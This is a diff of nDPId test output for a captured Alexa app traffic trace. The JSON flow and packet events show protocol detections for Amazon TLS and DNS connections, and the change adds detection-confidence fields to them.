 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976041400,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1130,"flow_tot_l4_payload_len":2403,"flow_avg_l4_payload_len":133,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45663,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":26,"flow_first_seen":1490976044189,"flow_last_seen":1490976046415,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1178,"flow_tot_l4_payload_len":6385,"flow_avg_l4_payload_len":245,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
@@ -779,49 +779,49 @@
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1490976044521,"flow_last_seen":1490976046418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":436,"flow_avg_l4_payload_len":33,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":29,"flow_first_seen":1490976046418,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1194,"flow_tot_l4_payload_len":9785,"flow_avg_l4_payload_len":337,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45680,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00583{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":15,"flow_first_seen":1490976047096,"flow_last_seen":1490976048927,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":574,"flow_avg_l4_payload_len":38,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45683,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00659{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00616{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1490976041942,"flow_last_seen":1490976046399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41433,"flow_avg_l4_payload_len":531,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54411,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1490976041961,"flow_last_seen":1490976042341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":5681,"flow_avg_l4_payload_len":334,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54412,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00650{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976042054,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54413,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":21,"flow_first_seen":1490976047560,"flow_last_seen":1490976048909,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8468,"flow_avg_l4_payload_len":403,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.216","src_port":54427,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
-00660{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":41,"flow_state":"finished","flow_packets_processed":29,"flow_first_seen":1490976043814,"flow_last_seen":1490976046408,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":10383,"flow_avg_l4_payload_len":358,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42129,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
+00686{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":42,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1490976043814,"flow_last_seen":1490976046401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":11039,"flow_avg_l4_payload_len":344,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42130,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":22,"flow_first_seen":1490976047563,"flow_last_seen":1490976048928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":5664,"flow_avg_l4_payload_len":257,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42143,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":23,"flow_first_seen":1490976047858,"flow_last_seen":1490976048917,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":4531,"flow_avg_l4_payload_len":197,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"72.21.206.135","src_port":42144,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00664{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
+00690{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1490976041870,"flow_last_seen":1490976042512,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6902,"flow_avg_l4_payload_len":276,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34019,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AmazonAWS","breed":"Acceptable","category":"Cloud"}}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1490976047014,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":6802,"flow_avg_l4_payload_len":272,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34033,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00587{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":43,"flow_first_seen":1490976047050,"flow_last_seen":1490976048924,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1460,"flow_tot_l4_payload_len":22531,"flow_avg_l4_payload_len":523,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"54.239.24.186","src_port":34034,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00611{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
+00647{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP_Proxy","breed":"Acceptable","category":"Web"}}
 00577{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976041434,"flow_last_seen":1490976041437,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"192.168.11.1","src_port":38391,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":18,"flow_first_seen":1490976037754,"flow_last_seen":1490976042398,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3335,"flow_avg_l4_payload_len":185,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"34.199.52.240","src_port":38364,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
-00669{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
-00653{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
-00655{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976071312,"flow_last_seen":1490976071389,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":25081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"}}
+00679{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976067916,"flow_last_seen":1490976067965,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":80,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":60804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
+00681{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":2549,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1490976064333,"flow_last_seen":1490976064448,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"ts_msec":1490976163868,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":44475,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":1,"flow_last_seen":1490976164994,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"ts_msec":1490976164994,"pkt":"AMDKkaPvePiC0\/vCCABFAAA+WmBAAEARM1WsECrYrBAqAfpJADUAKhd4KNkBAAABAAAAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAQ=="}
-00760{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2555,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976164994,"flow_last_seen":1490976164994,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"ts_msec":1490976164994,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_packet_id":2,"flow_last_seen":1490976165058,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":115,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":115,"pkt_l4_len":81,"ts_msec":1490976165058,"pkt":"ePiC0\/vCAMDKkaPvCABFAABl5+FAAEARpaysECoBrBAq2AA1+kkAUQAZKNmBgAABAAIAAAAABWFsZXhhBmFtYXpvbgNjb20AAAEAAcAMAAUAAQAAAAsACwhwaXRhbmd1acASwC4AAQABAAAABgAENF7ohg=="}
-00775{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
+00801{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":2556,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":135,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976164994,"flow_last_seen":1490976165058,"flow_idle_time":180000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":73,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":53,"midstream":0,"ts_msec":1490976165058,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":64073,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"dns": {"query":"alexa.amazon.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.134"}}
 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976165062,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976165062,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":39750,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2557,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":1,"flow_last_seen":1490976165062,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976165062,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8ZaZAAEAG4UisECrYNF7ohptGAbs\/AhtsAAAAAKAC\/\/\/dAQAAAgQFtAQCCAoA9n7KAAAAAAEDAwg="}
 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2558,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":136,"flow_packet_id":2,"flow_last_seen":1490976165120,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976165120,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwviBAAOcG4dk0XuiGrBAq2AG7m0ayU5bRPwIbbXASH\/4vqAAAAgQFtAEDAwY="}
